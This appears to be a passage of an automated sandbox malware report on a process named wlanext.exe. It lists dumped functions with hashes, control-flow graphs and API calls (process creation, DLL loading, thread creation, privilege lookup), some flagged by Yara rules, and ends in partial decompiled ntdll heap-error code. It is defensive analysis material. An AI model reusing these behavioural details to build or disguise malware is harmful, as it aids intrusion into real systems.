                                  • Opcode ID: a83764ecb845e2338244a5a9751494b771d1003514b78df4c962af75770ed1e8
                                  • Instruction ID: 5583c3883269aa83a8f5c267d5dbb2c08a70531ed0aaa2ef966823916520410f
                                  • Opcode Fuzzy Hash: a83764ecb845e2338244a5a9751494b771d1003514b78df4c962af75770ed1e8
                                  • Instruction Fuzzy Hash: 0190026936304802D180B159640860A01A5A7D2243F91D415A0005759CCA5588796361
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03529650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: fac26d9f280c5fac7f4521ca5c6d257fb8185574863e095bb9fe691967dd8c46
                                  • Instruction ID: fd9f374bfd5d85646ef3fe8478bb879a778bb7be77acc7ff04824fe27f669a5a
                                  • Opcode Fuzzy Hash: fac26d9f280c5fac7f4521ca5c6d257fb8185574863e095bb9fe691967dd8c46
                                  • Instruction Fuzzy Hash: 0390027135508C42D140B1595404A4601B5A7D1346F51C011A0054795D97658D65B6A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03529660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 5601776f7a88a3dca1189fe83482de374bbbb10ff7c9436e9e1b85c49c6c1ce4
                                  • Instruction ID: 91786daa4600601de8ac16cf9f141b06ca7520b60efd5b088d0604c847c5c7bc
                                  • Opcode Fuzzy Hash: 5601776f7a88a3dca1189fe83482de374bbbb10ff7c9436e9e1b85c49c6c1ce4
                                  • Instruction Fuzzy Hash: 3690027135104C02D180B159540464A01A5A7D2342F91C015A0015755DCB558A6977E1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 035296D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: cc46f115b453217f53137a050c82a03fae90ca3aadbde088d5d676d7a7f48d41
                                  • Instruction ID: 65ae62d4e0fa57e2fa370dcbecd9f0e34bf7e316e0b7ec72b4706c3273579bca
                                  • Opcode Fuzzy Hash: cc46f115b453217f53137a050c82a03fae90ca3aadbde088d5d676d7a7f48d41
                                  • Instruction Fuzzy Hash: 4590027135104C42D100A1595404B4601A5A7E1342F51C016A0114755D8755C8617561
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 035296E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: b86d154c3cce09ddd0c903e9a31d7fa9b041359d3d279815d754912a105cbecd
                                  • Instruction ID: f1953c99ead2c68e6da7d9bb3a984988fd72a2f02a1601a998eb7d23345695e8
                                  • Opcode Fuzzy Hash: b86d154c3cce09ddd0c903e9a31d7fa9b041359d3d279815d754912a105cbecd
                                  • Instruction Fuzzy Hash: 5C9002713510CC02D110A159940474A01A5A7D1342F55C411A4414759D87D588A17161
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03529540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: fe1a4090ca93847a1ee34e98a2ad121f6f8c6da32e961dba673ddee9bba92edb
                                  • Instruction ID: 6b74c850bd50356341878c5d61ad37567f0c7435b225e3068af8f16eb45eae7d
                                  • Opcode Fuzzy Hash: fe1a4090ca93847a1ee34e98a2ad121f6f8c6da32e961dba673ddee9bba92edb
                                  • Instruction Fuzzy Hash: 9D900265361048030105E559170450701E6A7D6392351C021F1005751CD76188716161
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 035295D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 313367e82104688fcc5359d66dd72a8de712d3fd31676247801ab64eb15d12c2
                                  • Instruction ID: 1577733c44df31e9378a78a25b25fd0926b7bfe06d56d5ceae73e32b807b382f
                                  • Opcode Fuzzy Hash: 313367e82104688fcc5359d66dd72a8de712d3fd31676247801ab64eb15d12c2
                                  • Instruction Fuzzy Hash: FF9002A1352048034105B159541461641AAA7E1242B51C021E1004791DC66588A17165
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03289070 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 244 3289070-32890b2 call 328bd30 247 32890b8-3289108 call 328be00 call 327ace0 call 3284e40 244->247 248 328918c-3289192 244->248 255 3289110-3289121 Sleep 247->255 256 3289123-3289129 255->256 257 3289186-328918a 255->257 258 328912b-3289151 call 3288c90 256->258 259 3289153-3289173 256->259 257->248 257->255 261 3289179-328917c 258->261 259->261 262 3289174 call 3288ea0 259->262 261->257 262->261
                                  APIs
                                  • Sleep.KERNELBASE(000007D0), ref: 03289118
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981277393.0000000003270000.00000040.80000000.00040000.00000000.sdmp, Offset: 03270000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_3270000_wlanext.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID: net.dll$wininet.dll
                                  • API String ID: 3472027048-1269752229
                                  • Opcode ID: 19b2dc4e8be44f3f682210694da1f207c9745981d98c44c8e79c3de727ddc7e6
                                  • Instruction ID: 73afc100ed0e1800ec491f70f6837d548f7b986d91614aa43edd8a8dc3957509
                                  • Opcode Fuzzy Hash: 19b2dc4e8be44f3f682210694da1f207c9745981d98c44c8e79c3de727ddc7e6
                                  • Instruction Fuzzy Hash: 8731B0B6905745BBC724EF64CC85F77B7B8BB48B00F04841DF62A5B284D770A590CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0328906C Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 264 328906c-32890b2 call 328bd30 268 32890b8-3289108 call 328be00 call 327ace0 call 3284e40 264->268 269 328918c-3289192 264->269 276 3289110-3289121 Sleep 268->276 277 3289123-3289129 276->277 278 3289186-328918a 276->278 279 328912b-3289151 call 3288c90 277->279 280 3289153-3289173 277->280 278->269 278->276 282 3289179-328917c 279->282 280->282 283 3289174 call 3288ea0 280->283 282->278 283->282
                                  APIs
                                  • Sleep.KERNELBASE(000007D0), ref: 03289118
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981277393.0000000003270000.00000040.80000000.00040000.00000000.sdmp, Offset: 03270000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_3270000_wlanext.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID: net.dll$wininet.dll
                                  • API String ID: 3472027048-1269752229
                                  • Opcode ID: be6e341ee2cff606a8266f1bf4058cf0f8fa40be6a8b971b3595c4c08f65721b
                                  • Instruction ID: 1ec4dd536fe22d551868c73d279366894e8fab12f846082073ce0b773a39f062
                                  • Opcode Fuzzy Hash: be6e341ee2cff606a8266f1bf4058cf0f8fa40be6a8b971b3595c4c08f65721b
                                  • Instruction Fuzzy Hash: 1621B1B5945305BBC714EF64CC85F7BB7B8BB48B00F04802DE6296B285D774A590CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0328A660 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 291 328a660-328a691 call 328af50 RtlFreeHeap
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,03273AF8), ref: 0328A68D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981277393.0000000003270000.00000040.80000000.00040000.00000000.sdmp, Offset: 03270000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_3270000_wlanext.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID: .z`
                                  • API String ID: 3298025750-1441809116
                                  • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                  • Instruction ID: 69180a137aa3e440c6de1896324764b0c620325293b7ef3b917a7c42a62c5841
                                  • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                  • Instruction Fuzzy Hash: 64E01AB5210204ABD714EF59CC44EA777ACAF88650F014555B91C5B241C631E9108AB0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0327830A Relevance: 3.1, APIs: 2, Instructions: 56threadwindowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0327836A
                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0327838B
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981277393.0000000003270000.00000040.80000000.00040000.00000000.sdmp, Offset: 03270000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_3270000_wlanext.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0
                                  • Opcode ID: 23aa93651efcc919eedc8d1d1ee42e4aaf964c49e104a9a16f181c4e700f5ed2
                                  • Instruction ID: 277350391339ad4d0c2504616ad31c8c615d91450e7535744e9459ed9650cac7
                                  • Opcode Fuzzy Hash: 23aa93651efcc919eedc8d1d1ee42e4aaf964c49e104a9a16f181c4e700f5ed2
                                  • Instruction Fuzzy Hash: 92017131A913297BE720E6949C06FBE766CAB40A50F044158FF08BE1C1E6E4694647F5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03278310 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 309 3278310-327831f 310 3278328-327835a call 328c9f0 call 327ace0 call 3284e40 309->310 311 3278323 call 328be50 309->311 318 327838e-3278392 310->318 319 327835c-327836e PostThreadMessageW 310->319 311->310 320 3278370-327838b call 327a470 PostThreadMessageW 319->320 321 327838d 319->321 320->321 321->318
                                  APIs
                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0327836A
                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0327838B
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981277393.0000000003270000.00000040.80000000.00040000.00000000.sdmp, Offset: 03270000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_3270000_wlanext.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0
                                  • Opcode ID: 9f6b7254b568deafea19610ad2f149634f201f71034e907c959efec66b5b2edc
                                  • Instruction ID: 8a9fb689aea74dee8c5e7b3740cdc9a8b83c7ff756677c2bbd82fcb58bd51d3c
                                  • Opcode Fuzzy Hash: 9f6b7254b568deafea19610ad2f149634f201f71034e907c959efec66b5b2edc
                                  • Instruction Fuzzy Hash: DA018F31A913297BE720FA989C07FBE776C6B40A50F084158FF04BE1C1E6E4694646F6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0327ACE0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 519 327ace0-327ad09 call 328cc40 522 327ad0f-327ad1d call 328d060 519->522 523 327ad0b-327ad0e 519->523 526 327ad1f-327ad2a call 328d2e0 522->526 527 327ad2d-327ad3e call 328b490 522->527 526->527 532 327ad57-327ad5a 527->532 533 327ad40-327ad54 LdrLoadDll 527->533 533->532
                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0327AD52
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981277393.0000000003270000.00000040.80000000.00040000.00000000.sdmp, Offset: 03270000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_3270000_wlanext.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                  • Instruction ID: 61bc3c9810c7dd29782b7113cec68f3a59b561c411235492ba1493efa2283364
                                  • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                  • Instruction Fuzzy Hash: FC0125B9D5020DA7DF10EBE4DC41FDEB378AB44318F144195E9089B281F671E758CB51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0328A6D0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 534 328a6d0-328a728 call 328af50 CreateProcessInternalW
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0328A724
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981277393.0000000003270000.00000040.80000000.00040000.00000000.sdmp, Offset: 03270000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_3270000_wlanext.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                  • Instruction ID: 8c25d37bbd76eea5725f044d8ad98c02caf0f05db7d86a05857219e887ce15c4
                                  • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                  • Instruction Fuzzy Hash: E101B2B2210208BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97240C630E851CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 032891A0 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 537 32891a0-32891c8 call 3284e40 540 32891ca-32891e6 call 328f2d2 CreateThread 537->540 541 32891e7-32891ec 537->541
                                  APIs
                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0327F040,?,?,00000000), ref: 032891DC
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981277393.0000000003270000.00000040.80000000.00040000.00000000.sdmp, Offset: 03270000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_3270000_wlanext.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID:
                                  • API String ID: 2422867632-0
                                  • Opcode ID: 342052936165191d8d59341284a610888e0964bc78b57980bd67943c0755f067
                                  • Instruction ID: cf34846637bfea30b257499c2cc7095a03b244b9d9332aa059cbdccc2af530b9
                                  • Opcode Fuzzy Hash: 342052936165191d8d59341284a610888e0964bc78b57980bd67943c0755f067
                                  • Instruction Fuzzy Hash: E9E06D373A13043AE220B699AC02FA7B39C8B81B20F540026FA0DEB2C0D5D5F44142A4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0328A7C0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                  Download Yara Rule
                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0327F1C2,0327F1C2,?,00000000,?,?), ref: 0328A7F0
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981277393.0000000003270000.00000040.80000000.00040000.00000000.sdmp, Offset: 03270000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_3270000_wlanext.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                  • Instruction ID: 64078602a1750d722e40030ff6c39a59bfe58058164fd69e9ec0e68e8e332450
                                  • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                  • Instruction Fuzzy Hash: C0E01AB5200208ABDB20EF49CC84EE737ADAF88650F018155BA0C5B241C935E8108BF5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0328A620 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RtlAllocateHeap.NTDLL(03284526,?,03284C9F,03284C9F,?,03284526,?,?,?,?,?,00000000,00000000,?), ref: 0328A64D
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981277393.0000000003270000.00000040.80000000.00040000.00000000.sdmp, Offset: 03270000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_3270000_wlanext.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                  • Instruction ID: f0247655978deef93282d924c1d951489eb9c5f7761d2b00eda0c666b766fdce
                                  • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                  • Instruction Fuzzy Hash: 3AE012B5210208ABDB24EF99CC40EA777ACAF88654F118559BA1C5B281CA31F9108AB0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0327F6C0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetErrorMode.KERNELBASE(00008003,?,03278D14,?), ref: 0327F6EB
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981277393.0000000003270000.00000040.80000000.00040000.00000000.sdmp, Offset: 03270000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_3270000_wlanext.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                  • Instruction ID: 17a033c393fc4a06d3a8af5ee379336d2a07c017a7f41cfb9bc286b7a34c1206
                                  • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                  • Instruction Fuzzy Hash: FCD05E666603053BE610FAA59C02F2673886B44A00F494064FA489B2C3E964E0004165
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0352967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: bb36fc267e88a300d349887cd12c58e7bea1f7e9666d09f8756aa65f812d7cdd
                                  • Instruction ID: 93d4cf5a7bd4bd6dc95a3047c7b490db014e0d76598a618a2e931b553c3be196
                                  • Opcode Fuzzy Hash: bb36fc267e88a300d349887cd12c58e7bea1f7e9666d09f8756aa65f812d7cdd
                                  • Instruction Fuzzy Hash: 5DB09B719414D9C9D611D76056087177E9477D1741F16C061D1020756A4778D0A5F5F5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 0359B260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE
                                  Download Yara Rule
                                  Strings
                                  • *** Inpage error in %ws:%s, xrefs: 0359B418
                                  • The resource is owned shared by %d threads, xrefs: 0359B37E
                                  • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0359B47D
                                  • The critical section is owned by thread %p., xrefs: 0359B3B9
                                  • *** then kb to get the faulting stack, xrefs: 0359B51C
                                  • read from, xrefs: 0359B4AD, 0359B4B2
                                  • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0359B305
                                  • This failed because of error %Ix., xrefs: 0359B446
                                  • The instruction at %p referenced memory at %p., xrefs: 0359B432
                                  • write to, xrefs: 0359B4A6
                                  • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0359B476
                                  • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0359B53F
                                  • *** Resource timeout (%p) in %ws:%s, xrefs: 0359B352
                                  • a NULL pointer, xrefs: 0359B4E0
                                  • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0359B2DC
                                  • The instruction at %p tried to %s , xrefs: 0359B4B6
                                  • *** enter .exr %p for the exception record, xrefs: 0359B4F1
                                  • an invalid address, %p, xrefs: 0359B4CF
                                  • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0359B323
                                  • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0359B39B
                                  • <unknown>, xrefs: 0359B27E, 0359B2D1, 0359B350, 0359B399, 0359B417, 0359B48E
                                  • *** An Access Violation occurred in %ws:%s, xrefs: 0359B48F
                                  • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0359B3D6
                                  • *** enter .cxr %p for the context, xrefs: 0359B50D
                                  • Go determine why that thread has not released the critical section., xrefs: 0359B3C5
                                  • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0359B314
                                  • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0359B38F
                                  • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0359B484
                                  • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0359B2F3
                                  • The resource is owned exclusively by thread %p, xrefs: 0359B374
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                  • API String ID: 0-108210295
                                  • Opcode ID: c16fb7e2c68080328461357bad29e4bfd674c3a40ec55b1a2755e0e692857ed7
                                  • Instruction ID: 80ae1cf6fb7498bad6eac1559b7bbcf3da71dacfc8113f996e4efa10775a574b
                                  • Opcode Fuzzy Hash: c16fb7e2c68080328461357bad29e4bfd674c3a40ec55b1a2755e0e692857ed7
                                  • Instruction Fuzzy Hash: AE81E279A40210FFFF21EA05FC95DAE3B36BF8BA92F454446F0081F132E2A58551D6B6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 035A1C06 Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 44%
                                  			E035A1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x34c48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E034EB150();
				} else {
					E034EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x35d589c);
				E034EB150("Heap error detected at %p (heap handle %p)\n",  *0x35d58a0);
				_t27 =  *0x35d5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M035A1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
